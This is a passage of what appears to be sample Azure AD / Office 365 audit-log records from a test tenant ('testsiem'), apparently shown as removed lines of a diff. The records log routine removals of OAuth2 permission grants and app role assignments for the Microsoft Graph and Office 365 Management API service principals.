"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, 